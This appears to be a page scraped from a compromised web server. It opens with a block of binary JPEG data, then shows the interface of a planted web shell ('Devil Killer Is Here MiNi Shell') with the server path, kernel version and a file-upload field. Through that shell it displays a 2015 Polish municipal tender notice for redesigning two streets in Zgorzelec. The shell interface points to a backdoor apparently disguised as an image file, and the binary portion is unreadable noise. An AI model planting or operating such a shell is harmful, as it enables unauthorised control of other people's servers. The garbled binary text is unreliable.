JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151118/310418-N-2015.html

<p class="kh_header"><b>Zgorzelec: Modernizacja ulicy Łużyckiej i ulicy E. Orzeszkowej w Zgorzelcu - dokumentacja projektowa</b><br>
<b>Numer ogłoszenia: 310418 - 2015; data zamieszczenia: 18.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ulicy Łużyckiej i ulicy E. Orzeszkowej w Zgorzelcu - dokumentacja projektowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje sporządzenie dokumentacji projektowej wraz z uzyskaniem decyzji pozwolenia na budowę razem z decyzjami, uzgodnieniami i umowami, warunkami, ekspertyzami, analizami i pomiarami niezbędnymi do jej uzyskania i prawidłowej realizacji inwestycji oraz pełnieniem nadzoru autorskiego w ramach zadania pn.: Modernizacja ulicy Łużyckiej i ulicy E. Orzeszkowej w Zgorzelcu.
2.	Zakres opracowania stanowi teren ulicy Łużyckiej począwszy od skrzyżowania ul. Warszawskiej z ul. Maratońską do skrzyżowania z ul. Reymonta oraz teren ulicy E. Orzeszkowej od skrzyżowania z ul. Łużycką do byłej bazy PKS. 
Lokalizację terenu przedstawiają mapy poglądowe oraz dokumentacja fotograficzna stanowiące Załącznik Nr 1 do SIWZ.
3.	Dane projektowanego terenu ulicy Łużyckiej :
a)	Ulica Łużycka na długości stanowiącej zakres opracowania posiada jezdnię wykonaną z mieszanki mineralno-asfaltowej o szerokości od 8,00 do 9,00 m oraz chodnik z kostki betonowej brukowej. Na ulicy Łużyckiej znajdują się zatoki postojowe dla samochodów osobowych oraz zatoki autobusowe wykonane z kostki  betonowej brukowej. W pasie drogowym ww. ulicy występuje liczne uzbrojenie podziemne, tj. sieć kanalizacji sanitarnej i deszczowej, sieć wodociągowa, gazowa, energetyczna, sieć ciepłownicza i telekomunikacyjna. Ulica jest oświetlona. Natężenie ruchu pojazdów jest duże (Zamawiający nie dysponuje badaniami ruchu). Teren opracowania znajduje się w zwartej zabudowie usługowo-handlowej i mieszkalnej.
b)	 Główne parametry techniczne ulicy Łużyckiej:
- długość trasy: 690 m (orientacyjny pomiar z natury);
- klasa drogi: droga gminna;
- węzły i skrzyżowania : 
a) Warszawska/ Maratońska,
b) Warszawska/ Nad kolejkę górską,
c) Łużycka/ Baczyńskiego,
d) Łużycka/ Słowackiego,
e) Łużycka/ Grunwaldzka/ Pogodna,
f) Łużycka/ Reymonta;
- obiekty inżynierskie : dwa wiadukty kolejowe.
c)	W zakres usługi wchodzi sporządzenie dokumentacji projektowej obejmującej    w szczególności zaprojektowanie:
- frezowania nawierzchni bitumicznej na odcinku od skrzyżowania ul. Warszawskiej    z ul. Maratońską do skrzyżowania ul. Łużyckiej z ul. Reymonta;
- dostosowania wszystkich przejść dla pieszych dla osób niepełnosprawnych;
- korekty nawierzchni chodników w miejscach w których jest to wymagane;
- regulacji istniejących krawężników wraz z dostosowanie ich do niwelety drogi;
- nawierzchni bitumicznej na całym odcinku objętym opracowaniem, tj. od skrzyżowania ul. Warszawskiej z ul. Maratońską do skrzyżowania ul. Łużyckiej z ul. Reymonta;
- regulacji studzienek kanalizacyjnych, wodociągowych, teletechnicznych;
- odprowadzenia wód opadowych i roztopowych z terenu objętego opracowaniem;
- naprawy bądź wymiany istniejących krawężników kamiennych,
- wyznaczenia kontrapasów dla ruchu rowerowego;
- korekty nawierzchni zatok autobusowych oraz postoju taksówek;
- odprowadzenia wód opadowych z powierzchni jezdni i chodników na całym odcinku objętym opracowaniem;
- elementów małej architektury w szczególności: ławek, koszy na śmieci, stojaków na rowery, urządzeń na psie odchody wraz z dystrybutorami worków na psie odchody, donic na kwiaty itp.;
- wykonania docelowej organizacji ruchu drogowego, a w tym : wymiany lub  ewentualnie odnowienia istniejącego oznakowania pionowego i poziomego;
- sieci kanalizacji deszczowej, wraz z uzbrojeniem i przyłączami kanalizacji deszczowej do budynków zlokalizowanych wzdłuż ulicy, urządzeniami specjalnymi (pompy, separatory, kaskady, syfony, zbiorniki retencyjne itp.) oraz zabezpieczeniem obiektów znajdujących się w bezpośrednim sąsiedztwie projektowanego kanału i obiektów na nim zlokalizowanych;
- oświetlenia drogowego ul. Łużyckiej na odcinku pomiędzy wiaduktami kolejowymi.
d)	W przypadku przebudowy skrzyżowania z ulicą/działką stanowiącą własność Skarbu Państwa, w szczególności z ul. Reymonta, uzyskać stosowane uzgodnienie. Dla terenu zlokalizowanego pomiędzy wiaduktami kolejowymi uzyskać stosowne uzgodnienia.
4.	Dane projektowanego terenu ulicy E. Orzeszkowej :
a)	Zakres opracowania stanowi teren ulicy E. Orzeszkowej od skrzyżowania z ul. Łużycką do byłej bazy PKS (działki będące własnością Gminy Miejskiej Zgorzelec) oraz teren ul. Francuskiej do mostu na rzece Czerwona Woda wraz z przylegającymi do niej działkami i ul. Szarych Szeregów.
b)	Ulica E. Orzeszkowej od skrzyżowania z ul. Łużycką do wysokości Gimnazjum  Nr 2 posiada jezdnię o nawierzchni z mieszanki mineralno-asfaltowej. Od wysokości Gimnazjum Nr 2 jezdnia wykonana jest z kostki kamiennej 9/11 cm o szerokości od 8,00 do 8,50 m. Ulica posiada chodnik z kostki betonowej brukowej, lokalnie bitumicznej oraz z płytek betonowych. Na ul. E. Orzeszkowej znajdują się zatoki postojowe dla samochodów osobowych wykonane z płytek betonowych i kostki betonowej brukowej. W pasie drogowym ww. ulicy występuje liczne uzbrojenie podziemne, tj. sieć kanalizacji sanitarnej i deszczowej, sieć wodociągowa, gazowa, energetyczna, sieć ciepłownicza i telekomunikacyjna. Ulica jest oświetlona. Natężenie ruchu pojazdów jest duże (Zamawiający nie dysponuje pomiarami ruchu). Teren opracowania znajduje się w zwartej zabudowie usługowo-handlowej oraz mieszkalnej i dydaktycznej. 
c)	Główne parametry techniczne ulicy E. Orzeszkowej:
- długość trasy: 650 m (orientacyjny pomiar z natury);
- klasa drogi: droga gminna;
- węzły i skrzyżowania : 
a) Orzeszkowa/ Łużycka,
b) Orzeszkowa/ Turowska,
c) Orzeszkowa/ Francuska,
d) Orzeszkowa/ Al. Ujazdowskie,
e) Orzeszkowa/ Chełmońskiego,
- obiekty inżynierskie: brak.
d)	W zakres usługi wchodzi sporządzenie dokumentacji projektowej obejmującej   w szczególności zaprojektowanie:
- przebudowy ulic, skrzyżowań, chodników, miejsc postojowych (nawierzchnia drogi z mieszanki mineralno-asfaltowej, chodniki, miejsca postojowe oraz zatoki autobusowe z kostki brukowej betonowej);
- likwidacji kolizji z sieciami branżowymi zlokalizowanymi w ulicach będących w zakresie opracowania;
- elementów małej architektury w szczególności obiektów użytkowych służących odpoczynkowi, utrzymaniu porządku i poprawie estetyki, tj.: ławek, koszy na śmieci, stojaków na rowery, urządzeń na psie odchody wraz z dystrybutorami worków na psie odchody, donic na kwiaty itp.;
- kanalizacji deszczowej wraz z przyłączami i jej elementami (studnie rewizyjne, studzienki ściekowe z wpustami ulicznymi, przykanalikami);
- nowego kolektora kołowego sieci kanalizacji deszczowej/ w razie konieczności;
- przyłączy budynków do sieci kanalizacji deszczowej do granic nieruchomości (Wykonawca zobowiązany będzie do pisemnego uzgodnienia szczegółowych lokalizacji i ilości przyłączy z właścicielami nieruchomości zlokalizowanych wzdłuż modernizowanej drogi);
- przyłączy budynków do sieci kanalizacji deszczowej zakończonych od strony granicy działki studzienką rewizyjną np. o średnicy 300;
- przyłączy do budynków połączonych z kolektorem głównym za pośrednictwem studni rewizyjnych lub trójników. Wykonawca zobowiązany będzie również do rozważenia możliwości i konieczności zastosowania urządzeń zabezpieczających cofanie się wody na przyłączach np. zaprojektowanie klap zwrotnych;
- odwodnienia drogi - odwodnienie powierzchniowe np. poprzez studzienki uliczne ściekowe o średnicy 500 z osadnikami lub częściowe odwodnienie liniowe lub inne możliwe rozwiązanie;
- elementów wchodzących w skład odwodnienia terenu wykonanych w technologii uniemożliwiającej (bez konieczności przeprowadzenia robót budowlanych) ich łatwy demontaż lub kradzież, np. uwzględnienie do zabudowy krat uchylnych, włazów typu ciężkiego lub uchylnych;
- sieci kanalizacji deszczowej wraz z uzbrojeniem i przyłączami kanalizacji deszczowej oraz ich uzbrojeniem do budynków zlokalizowanych wzdłuż ulicy, urządzeniami specjalnymi (pompy, separatory, kaskady, syfony, zbiorniki retencyjne itp.), zabezpieczeniem obiektów znajdujących się w bezpośrednim sąsiedztwie projektowanego kanału i obiektów na nim zlokalizowanych;
- odwodnienia powierzchniowego jezdni, ścieżek rowerowych, chodników, miejsc parkingowych oraz zatok autobusowych;
- miejsc parkingowych;
- budowy zatok autobusowych;
- ścieżek rowerowych;
- uzupełnienia przestrzeni zielenią wysoką i niską;
- rabat;
- oświetlenia ul. E. Orzeszkowej;
- przepięcia, przebudowy lub dodatkowego odpowadzenia wód opadowych i roztopowych z sieci kanalizacji deszczowej wchodzącej w ul. E. Orzeszkowej z terenu osiedla przy ul. Chełmońskiego, Okólnej, Turowskiej, Malczewskiego, Kottisa, Braci Gierymskich, Brandta, Konicza;
- docelowej organizacji ruchu.
e)	Modernizowane (przebudowywane) elementy układu komunikacyjnego winny być dostosowane do potrzeb osób niepełnosprawnych.
f)	Ukształtowanie terenu oraz nawierzchnie jezdni, chodników, zjazdów, miejsc postojowych i placów, obiekty małej architektury, a także pozostałe elementy zagospodarowania powinny nawiązywać do zmodernizowanych części ul. E. Orzeszkowej i miasta Zgorzelec, z uwzględnieniem współczesnych wymagań użytkowych i technicznych.
g)	Wszystkim modernizowanym nawierzchniom należy zapewnić właściwe powierzchniowe odwodnienie poprzez nadane spadki poprzeczne i podłużne. Wody opadowe i roztopowe należy odprowadzić poprzez istniejące i projektowane studzienki ściekowe, przykanaliki i kanały do sieci miejskiej kanalizacji deszczowej. Zaprojektować studnie rewizyjne i odprowadzić do nich przykanalikami wody opadowe z budynków zlokalizowanych wzdłuż ulicy.
h)	Teren ul. Francuskiej, ul. Szarych Szeregów oraz działki do nich przylegające stanowić będą teren, w którym zabudowana zostanie sieć kanalizacji deszczowej odprowadzająca wody opadowe i roztopowe z ul. E. Orzeszkowej. Zamawiający dopuszcza przebieg inną trasą zaproponowaną przez Wykonawcę.
i)	W przypadku zaprojektowania sieci kanalizacji odprowadzającej wody opadowe i roztopowe z ul. E. Orzeszkowej ciągami komunikacyjnymi wskazanymi przez Zamawiającego, bądź  innymi, należy zaprojektować odtworzenie nawierzchni.
j)	Przebudowa nie obejmuje nawierzchni chodników i zjazdów indywidualnych na odcinku od skrzyżowania z ul. Łużycką do skrzyżowania z ul. Szarych Szeregów prawa strona oraz od skrzyżowania z ul. Chełmońskiego do granicy z Gimnazjum Nr 2 lewa strona.
k)	Nawierzchnie chodnika i parkingu na odcinku od ul. Turowskiej do bloku przy     ul. Orzeszkowej Nr 7 należy przewidzieć do przełożenia lub ewentualnej wymiany  z zachowaniem wzoru kostki jak na pozostały odcinkach.            
5.	Dla wskazanych powyżej terenów został opracowany Miejscowy Plan Zagospodarowania Przestrzennego Obszaru Południe w Zgorzelcu, uchwalony uchwałą Nr 150/04 Rady Miasta Zgorzelec z dnia 05 marca 2004r. w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego dzielnicy Ujazd Południe w Zgorzelcu, opublikowany w Dzienniku Urzędowym Województwa Dolnośląskiego Nr 63 poz. 1258 z dnia 07 kwietnia 2004r. Miejscowy Plan Zagospodarowania Przestrzennego dzielnicy Ujazd Południe został zmieniony uchwałą Nr 385/10 Rady Miasta Zgorzelec z dnia 08 czerwca 2010r. w sprawie zmiany miejscowego planu zagospodarowania przestrzennego dzielnicy Ujazd Południe w Zgorzelcu w rejonie ulicy Orzeszkowej, opublikowaną w Dzienniku Urzędowym Województwa Dolnośląskiego Nr 137 poz. 2107 z dnia 26 lipca 2010r.
6.	Pod warunkiem rozpoczęcia przez Zamawiającego realizacji robót budowlanych na podstawie dokumentacji projektowej, stanowiącej przedmiot zamówienia, Wykonawca zobowiązany będzie do pełnienia nadzoru autorskiego nad dokumentacją projektową przy realizacji robót budowlanych, zgodnie z warunkami sprawowania nadzoru autorskiego określonymi w Załączniku nr 1 do SIWZ.
7.	Pozostałe obowiązki Wykonawcy zostały zawarte w projekcie umowy, stanowiącej Formularz Nr 7 do SIWZ.
8.	Zamawiający wymaga 5 lat gwarancji i rękojmi na zrealizowany przedmiot zamówienia, zgodnie z zapisami § 8 projektu umowy, stanowiącego Formularz Nr 7 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 200.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Wykonawca wniesie wadium w wysokości 4.800,00 zł przed upływem terminu składania ofert, który został określony w pkt. 16 ppkt. 3 SIWZ.

2)	W zależności od woli Wykonawcy wadium może być wnoszone w formach:

a)	pieniądzu (przelew na rachunek bankowy wskazany przez zamawiającego),
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości               (tj. Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).

3)	W przypadku wnoszenia wadium w formach, o których mowa w pkt. 19 ppkt. 2 lit. od b do e SIWZ oryginał gwarancji/poręczenia należy umieścić w ofercie w sposób umożliwiający jego zwrot zgodnie z zapisami ustawy Prawo zamówień publicznych.

4)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr 75 1240 3464 1111 0010 6448 8461,  z zaznaczeniem Wadium do postępowania nr WZP.271.54.2015 /kopię przelewu (wpłaty) proszę dołączyć do oferty/.             
Skuteczne wniesienie wadium następuje w chwili uznania (zaksięgowania) kwoty wadium na rachunku bankowym Zamawiającego, co oznacza, iż wadium musi znaleźć się na rachunku Zamawiającego najpóźniej do dnia oraz godziny wyznaczonych jako termin składania ofert.

5)	Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie uznana za odrzuconą zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych.

6)	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 19 ppkt. 7 SIWZ.

7)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.

8)	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

9)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

10)	W przypadku wniesienia wadium w formach wymienionych w pkt. 19 ppkt. 2 lit. od b do e SIWZ z treści dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy gwarancyjnej nastąpi także w przypadku określonym w pkt. 19 ppkt. 7 SIWZ. 

11)	Zamawiający wymaga, aby niepieniężne formy zapłaty wadium miały charakter nieodwołalny i bezwarunkowy - równoważny pieniądzu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje wymagań w zakresie sposobu dokonywania oceny powyższego warunku. Zamawiający oceni czy Wykonawca spełnia powyższy warunek w oparciu                                 o oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w pkt. III.4.1 ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje wymagań w zakresie sposobu dokonywania oceny powyższego warunku. Zamawiający oceni czy Wykonawca spełnia powyższy warunek w oparciu                                 o oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w pkt. III.4.1 ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje wymagań w zakresie sposobu dokonywania oceny powyższego warunku. Zamawiający oceni czy Wykonawca spełnia powyższy warunek w oparciu                                 o oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w pkt. III.4.1 ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje  lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć                                 w wykonywaniu zamówienia, tj. posiadającymi uprawnienia projektowe określone przepisami Prawa budowlanego w następujących specjalnościach:
1) inżynieryjnej drogowej bez ograniczeń lub odpowiadające im uprawnienia w specjalności konstrukcyjno-budowlanej bez ograniczeń wydane przed 11.07.2003r., oraz doświadczenie                    w wykonaniu co najmniej 1 dokumentacji projektowej dot. modernizacji, przebudowy lub budowy drogi na stanowisku projektanta w branży inżynieryjnej drogowej bez ograniczeń lub konstrukcyjno-budowlanej bez ograniczeń wydane przed 11.07.2003r., wraz z informacją                                o podstawie do dysponowania tą osobą - Formularz Nr 3 do SIWZ. 
2) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń wraz z informacją o podstawie do dysponowania tą osobą - Formularz Nr 3 do SIWZ. 
3) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń wraz z informacją o podstawie do dysponowania tą osobą - Formularz Nr 3 do SIWZ. 


UWAGA:
Projektanci powinni posiadać uprawnienia budowlane zgodne z ustawą z dnia 07 lipca 1994 r. Prawo budowlane                            (t. j. Dz. U. z 2013 r., poz. 1409 ze zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r.  w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający dopuszcza także odpowiadające im uprawnienia nabyte w państwach członkowskich Unii Europejskiej na zasadach określonych  w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U.  z 2008 r. Nr 63, poz. 394 ze zm.).

Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie                                 o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt. 10 ppkt. 1) lit. a) SIWZ oraz dokumenty wymienione w pkt.  10 ppkt. 1 lit. b i c SIWZ.

Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw do wykluczenia zostaną dokonane zgodnie z formułą spełnia/nie spełnia, na  podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, o których mowa w pkt. 10 SIWZ.
Nie wykazanie w wystarczający sposób potwierdzenia spełniania warunków udziału w postępowaniu oraz potwierdzenia braku podstaw do wykluczenia spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności określonej w art. 26 ust. 3 ustawy Prawo zamówień publicznych - wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje wymagań w zakresie sposobu dokonywania oceny powyższego warunku. Zamawiający oceni czy Wykonawca spełnia powyższy warunek w oparciu                                 o oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w pkt. III.4.1 ogłoszenia.</p>
</li></ul></li></ul>
